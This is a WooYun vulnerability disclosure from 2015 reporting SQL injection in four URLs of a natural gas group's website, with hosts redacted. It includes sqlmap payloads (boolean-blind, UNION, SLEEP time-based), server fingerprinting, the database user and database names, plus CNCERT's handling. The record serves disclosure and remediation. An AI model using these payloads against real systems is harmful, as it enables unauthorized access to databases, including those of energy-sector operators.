当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146988

漏洞标题:工控安全之天然气工业主站sql注射漏洞(涉及4裤169表/4处打包)

相关厂商:天然气集团

漏洞作者: 路人甲

提交时间:2015-10-16 09:43

修复时间:2015-12-04 16:40

公开时间:2015-12-04 16:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-16: 细节已通知厂商并且等待厂商处理中
2015-10-20: 厂商已经确认,细节仅向厂商公开
2015-10-30: 细节向核心白帽子及相关领域专家公开
2015-11-09: 细节向普通白帽子公开
2015-11-19: 细节向实习白帽子公开
2015-12-04: 细节向公众公开

简要描述:

4处打包,懒得刷分

详细说明:

注入为get类型
总共4处

http://**.**.**.**/fblog/artview?ID=101&id=15594


http://**.**.**.**/index?m=ftheme&a=listbk&tpl=2&tid=214


**.**.**.**/index?m=ftheme&a=listbk&tpl=2&tid=214


http://**.**.**.**/fblog/index?ID=1850


以这个为例子演示一下

**.**.**.**/index?m=ftheme&a=listbk&tpl=2&tid=214


Place: GET
Parameter: tid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: m=ftheme&a=listbk&tpl=2&tid=214 AND 5810=5810
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: m=ftheme&a=listbk&tpl=2&tid=-8154 UNION SELECT NULL, CONCAT(0x3a6
66a3a,0x4967466c484168714b47,0x3a6562723a)#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: m=ftheme&a=listbk&tpl=2&tid=214 AND SLEEP(5)
---
[16:24:12] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.28, Apache 2.4.9
back-end DBMS: MySQL 5.0.11
[16:24:12] [INFO] fetching current user
current user: 'trqgydb@localhost'


available databases [4]:
[*] information_schema
[*] test
[*] trqgydb
[*] trqgydb_en


169表

[16:30:06] [INFO] the SQL query used returns 169 entries
[16:30:08] [INFO] retrieved: "[u'information_schema', u'CHARACTER_SETS']"
[16:30:10] [INFO] retrieved: "[u'information_schema', u'COLLATIONS']"
[16:30:12] [INFO] retrieved: "[u'information_schema', u'COLLATION_CHARACTER_S
[16:30:14] [INFO] retrieved: "[u'information_schema', u'COLUMNS']"
[16:30:16] [INFO] retrieved: "[u'information_schema', u'COLUMN_PRIVILEGES']"
[16:30:18] [INFO] retrieved: "[u'information_schema', u'ENGINES']"
[16:30:19] [INFO] retrieved: "[u'information_schema', u'EVENTS']"

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-20 16:39

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向能源行业信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无